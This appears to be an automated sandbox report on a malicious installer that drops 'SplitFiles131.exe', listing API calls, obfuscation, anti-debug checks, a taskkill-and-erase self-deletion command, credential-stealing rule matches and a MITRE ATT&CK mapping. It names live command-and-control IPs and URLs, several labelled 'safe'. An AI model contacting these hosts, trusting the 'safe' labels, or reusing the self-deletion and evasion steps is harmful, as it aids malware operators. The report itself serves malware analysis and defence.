Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe | Code function: 2_2_00401B30 HttpAddRequestHeadersA,InternetSetFilePointer,InternetReadFile,HttpQueryInfoA,CoCreateInstance,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp | File read: C:\Users\desktop.ini
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp | Code function: 1_2_004547A0 GetModuleHandleA,6D715550,GetDiskFreeSpaceA,
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe | Code function: 2_2_00402BF0 VirtualProtect,GetLastError,FormatMessageA,LocalAlloc,OutputDebugStringA,LocalFree,LocalFree,LocalFree,
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe | Code function: 2_2_00405350 CreateToolhelp32Snapshot,Process32First,Process32Next,Process32Next,FindCloseChangeNotification,
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4788:120:WilError_01
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp | Code function: 1_2_0040B090 FindResourceA,FreeResource,
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp | File created: C:\Program Files (x86)\Split Files
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe | Command line argument: `a}{
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe | Command line argument: MFE.
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe | Command line argument: ZK]Z
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe | Command line argument: ZK]Z
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp | Window found: window name: TMainForm
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: file.exe | Static file information: File size 1970815 > 1048576

                Data Obfuscation

Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe | Unpacked PE file: 2.2.SplitFiles131.exe.400000.1.unpack
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe | Unpacked PE file: 2.2.SplitFiles131.exe.400000.1.unpack .text:ER;.rdata:R;.data:W;.tls:W;.rsrc:R;.ave131:EW; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00406594 push 004065D1h; ret
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00404159 push eax; ret
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00404229 push 00404435h; ret
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004042AA push 00404435h; ret
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00404327 push 00404435h; ret
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00408BDC push 00408C0Fh; ret
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0040438C push 00404435h; ret
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00407F3C push ecx; mov dword ptr [esp], eax
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp | Code function: 1_2_00409A20 push 00409A5Dh; ret
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp | Code function: 1_2_0040A107 push ds; ret
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp | Code function: 1_2_004302D0 push ecx; mov dword ptr [esp], eax
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp | Code function: 1_2_004063C0 push ecx; mov dword ptr [esp], eax
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp | Code function: 1_2_004785C8 push 00478673h; ret
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp | Code function: 1_2_00410798 push ecx; mov dword ptr [esp], edx
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp | Code function: 1_2_004129F0 push 00412A53h; ret
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp | Code function: 1_2_0045AA9C push ecx; mov dword ptr [esp], eax
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp | Code function: 1_2_00450EB4 push 00450EE7h; ret
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp | Code function: 1_2_0040D0F0 push ecx; mov dword ptr [esp], edx
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp | Code function: 1_2_00443530 push ecx; mov dword ptr [esp], ecx
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp | Code function: 1_2_004055BD push eax; ret
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp | Code function: 1_2_0040F650 push ecx; mov dword ptr [esp], edx
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp | Code function: 1_2_0040568D push 00405899h; ret
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp | Code function: 1_2_0040570E push 00405899h; ret
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp | Code function: 1_2_004057F0 push 00405899h; ret
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp | Code function: 1_2_0040578B push 00405899h; ret
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp | Code function: 1_2_00479B20 push ecx; mov dword ptr [esp], ecx
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp | Code function: 1_2_00419CF0 push ecx; mov dword ptr [esp], ecx
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe | Code function: 2_2_004311AD push esi; ret
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe | Code function: 2_2_0040F4BB push ecx; ret
Source: SplitFiles131.exe.1.dr | Static PE information: section name: .ave131
Source: initial sample | Static PE information: section name: .text entropy: 7.241012836973415
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp | File created: C:\Users\user\AppData\Local\Temp\is-R8QPS.tmp\_isetup\_setup64.tmp
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp | File created: C:\Users\user\AppData\Local\Temp\is-R8QPS.tmp\_isetup\_shfoldr.dll
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe | File created: C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\rf6CwnLa.exe
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp | File created: C:\Program Files (x86)\Split Files\SplitFiles131.exe
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp | File created: C:\Program Files (x86)\Split Files\unins000.exe (copy)
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp | File created: C:\Users\user\AppData\Local\Temp\is-R8QPS.tmp\_iscrypt.dll
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp | File created: C:\Program Files (x86)\Split Files\is-5V8K4.tmp
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp | Code function: 1_2_00423CD4 IsIconic,PostMessageA,PostMessageA,PostMessageA,SendMessageA,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp | Code function: 1_2_00423CD4 IsIconic,PostMessageA,PostMessageA,PostMessageA,SendMessageA,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp | Code function: 1_2_00478118 IsIconic,GetWindowLongA,ShowWindow,ShowWindow,
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp | Code function: 1_2_0042425C IsIconic,SetActiveWindow,
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp | Code function: 1_2_004242A4 IsIconic,SetActiveWindow,SetFocus,
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp | Code function: 1_2_0041844C IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp | Code function: 1_2_00422924 SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp | Code function: 1_2_00417660 IsIconic,GetCapture,
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp | Code function: 1_2_00417D96 IsIconic,SetWindowPos,
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp | Code function: 1_2_00417D98 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,
Source: C:\Users\user\Desktop\file.exe | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\file.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\file.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\file.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\file.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\file.exe | Evasive API call chain: GetSystemTime,DecisionNodes
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-R8QPS.tmp\_isetup\_setup64.tmp
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-R8QPS.tmp\_isetup\_shfoldr.dll
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\Split Files\unins000.exe (copy)
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\Split Files\is-5V8K4.tmp
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe | Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe | Code function: __Init_thread_footer,GetUserNameA,GetUserNameA,__Init_thread_footer,GetUserNameA,__Init_thread_footer,GetUserNameA,GetForegroundWindow,GetWindowTextA,Sleep,Sleep,GetForegroundWindow,GetWindowTextA,
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe | Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00409764 GetSystemInfo,VirtualQuery,VirtualProtect,VirtualProtect,VirtualQuery,
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp | Code function: 1_2_0046CA68 FindFirstFileA,FindNextFileA,FindClose,
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp | Code function: 1_2_00474A14 FindFirstFileA,FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose,
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp | Code function: 1_2_0045157C FindFirstFileA,GetLastError,
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp | Code function: 1_2_0045E244 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp | Code function: 1_2_0048AC5C FindFirstFileA,6D7169D0,FindNextFileA,FindClose,
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp | Code function: 1_2_00472CD4 FindFirstFileA,FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose,
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp | Code function: 1_2_0045CDA4 FindFirstFileA,FindNextFileA,FindClose,
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp | Code function: 1_2_0045DEB0 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe | Code function: 2_2_00404490 FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe | Code function: 2_2_00423E2D FindFirstFileExW,
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe | Code function: 2_2_1000959D FindFirstFileExW,
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Temp\
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp
Source: SplitFiles131.exe, 00000002.00000002.376419998.0000000001613000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWN
Source: SplitFiles131.exe, 00000002.00000002.376419998.0000000001613000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000002.376486762.000000000164B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe | Code function: 2_2_0041336B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe | Code function: 2_2_00402BF0 VirtualProtect,GetLastError,FormatMessageA,LocalAlloc,OutputDebugStringA,LocalFree,LocalFree,LocalFree,
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe | Code function: 2_2_00402F20 SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,VirtualAlloc,VirtualAlloc,VirtualAlloc,GetProcessHeap,HeapAlloc,VirtualFree,SetLastError,VirtualAlloc,
Source: C:\Windows\SysWOW64\taskkill.exe | Process token adjusted: Debug
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe | Code function: 2_2_0044028F mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe | Code function: 2_2_0042041F mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe | Code function: 2_2_004429E7 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe | Code function: 2_2_00417BAF mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe | Code function: 2_2_100091C7 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe | Code function: 2_2_10006CE1 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe | Code function: 2_2_0040F789 SetUnhandledExceptionFilter,
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe | Code function: 2_2_0041336B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe | Code function: 2_2_0040F5F5 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe | Code function: 2_2_0040EBD2 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe | Code function: 2_2_10006180 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe | Code function: 2_2_100035DF SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe | Code function: 2_2_10003AD4 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im "SplitFiles131.exe" /f
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /im "SplitFiles131.exe" /f & erase "C:\Program Files (x86)\Split Files\SplitFiles131.exe" & exit
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im "SplitFiles131.exe" /f
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp | Code function: 1_2_00459734 GetVersion,GetModuleHandleA,6D715550,6D715550,6D715550,AllocateAndInitializeSid,LocalFree,
Source: C:\Users\user\Desktop\file.exe | Code function: GetLocaleInfoA,
Source: C:\Users\user\Desktop\file.exe | Code function: GetLocaleInfoA,
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp | Code function: GetLocaleInfoA,
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp | Code function: GetLocaleInfoA,
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe | Code function: GetKeyboardLayoutList,GetLocaleInfoA,__Init_thread_footer,
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe | Code function: EnumSystemLocalesW,
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe | Code function: EnumSystemLocalesW,
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe | Code function: EnumSystemLocalesW,
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe | Code function: EnumSystemLocalesW,
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe | Code function: GetLocaleInfoW,
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe | Code function: GetLocaleInfoW,
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe | Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe | Code function: GetLocaleInfoW,
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe | Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe | Code function: 2_2_0040F7F3 cpuid
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp | Code function: 1_2_00455E7C GetTickCount,QueryPerformanceCounter,GetSystemTimeAsFileTime,GetCurrentProcessId,CreateNamedPipeA,GetLastError,6D715CA0,SetNamedPipeHandleState,6DB87180,CloseHandle,CloseHandle,
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004026C4 GetSystemTime,
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00405CC0 GetVersionExA,
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp | Code function: 1_2_00453D18 GetUserNameA,

                Stealing of Sensitive Information

                Source: Yara match | File source: 2.2.SplitFiles131.exe.400000.1.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 2.2.SplitFiles131.exe.3210000.3.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 2.2.SplitFiles131.exe.400000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 2.2.SplitFiles131.exe.3210000.3.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000002.00000002.376873365.0000000003270000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000002.00000002.376708257.0000000003210000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000002.00000002.375917003.0000000000400000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                MITRE ATT&CK Matrix (a number before a technique is the count of report signatures mapped to it):

                Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
                Valid Accounts | 1 Windows Management Instrumentation | Path Interception | 1 Access Token Manipulation | 2 Masquerading | 1 Input Capture | 1 System Time Discovery | Remote Services | 1 Input Capture | Exfiltration Over Other Network Medium | 2 Encrypted Channel | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
                Default Accounts | 2 Command and Scripting Interpreter | Boot or Logon Initialization Scripts | 12 Process Injection | 1 Disable or Modify Tools | LSASS Memory | 141 Security Software Discovery | Remote Desktop Protocol | 1 Archive Collected Data | Exfiltration Over Bluetooth | 2 Ingress Tool Transfer | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
                Domain Accounts | 2 Native API | Logon Script (Windows) | Logon Script (Windows) | 1 Access Token Manipulation | Security Account Manager | 2 Process Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | 1 Non-Application Layer Protocol | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
                Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | 12 Process Injection | NTDS | 11 Application Window Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | 11 Application Layer Protocol | SIM Card Swap | Carrier Billing Fraud |
                Cloud Accounts | Cron | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 1 Account Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings |
                Replication Through Removable Media | Launchd | Rc.common | Rc.common | 3 Obfuscated Files or Information | Cached Domain Credentials | 1 System Owner/User Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features |
                External Remote Services | Scheduled Task | Startup Items | Startup Items | 23 Software Packing | DCSync | 3 File and Directory Discovery | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact |
                Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | 26 System Information Discovery | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | Generate Fraudulent Advertising Revenue |

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                Behavior Graph ID: 778239, Sample: file.exe, Startdate: 05/01/2023, Architecture: WINDOWS, Score: 100

                Contacted at start: 45.139.105.1 (CMCSUS, Italy); 85.31.46.167 (CLOUDCOMPUTINGDE, Germany)
                Signatures at start: Snort IDS alert for network traffic; Multi AV Scanner detection for domain / URL; Antivirus detection for URL or domain; 5 other signatures

                Process tree:
                • file.exe (started)
                  • dropped: C:\Users\user\AppData\Local\...\is-EPSRP.tmp (PE32)
                  • is-EPSRP.tmp (started)
                    • dropped: C:\Users\user\AppData\Local\...\_setup64.tmp (PE32+); C:\Users\user\AppData\Local\...\_iscrypt.dll (PE32); C:\...\unins000.exe (copy) (PE32); 3 other files (2 malicious)
                    • SplitFiles131.exe (started)
                      • network: 107.182.129.235 port 80 from local port 49697 (META-ASUS, Reserved); 45.139.105.171 port 80 from local port 49696 (CMCSUS, Italy); 171.22.30.106 port 80 from local port 49698 (CMCSUS, Germany)
                      • dropped: C:\Users\user\AppData\...\rf6CwnLa.exe (PE32)
                      • rf6CwnLa.exe (started); signature: Multi AV Scanner detection for dropped file
                      • cmd.exe (started)
                        • taskkill.exe (started)
                        • conhost.exe (started)

                No Antivirus matches
                Source | Detection | Scanner | Label
                C:\Program Files (x86)\Split Files\SplitFiles131.exe | 100% | Joe Sandbox ML |
                C:\Users\user\AppData\Local\Temp\is-R8QPS.tmp\_iscrypt.dll | 0% | ReversingLabs |
                C:\Users\user\AppData\Local\Temp\is-R8QPS.tmp\_isetup\_setup64.tmp | 0% | ReversingLabs |
                C:\Users\user\AppData\Local\Temp\is-R8QPS.tmp\_isetup\_shfoldr.dll | 0% | ReversingLabs |
                C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\rf6CwnLa.exe | 50% | ReversingLabs | Win32.Trojan.Generic
                Source | Detection | Scanner | Label
                2.2.SplitFiles131.exe.10000000.5.unpack | 100% | Avira | TR/Crypt.XPACK.Gen8
                0.0.file.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen2
                1.2.is-EPSRP.tmp.400000.0.unpack | 100% | Avira | HEUR/AGEN.1248792
                2.2.SplitFiles131.exe.400000.1.unpack | 100% | Avira | HEUR/AGEN.1250671
                0.2.file.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen2
                No Antivirus matches
                Source | Detection | Scanner | Label
                http://www.innosetup.com/ | 0% | URL Reputation | safe
                http://45.139.105.171/itsnotmalware/count.php?sub=NOSUB&stream=mixtwo&substream=mixinte | 0% | URL Reputation | safe
                http://107.182.129.235/storage/extension.php | 0% | URL Reputation | safe
                http://www.remobjects.com/?ps | 0% | URL Reputation | safe
                http://www.innosetup.com | 0% | URL Reputation | safe
                http://107.182.129.235/storage/ping.php | 0% | URL Reputation | safe
                http://107.182.129.235ibrary.php | 0% | URL Reputation | safe
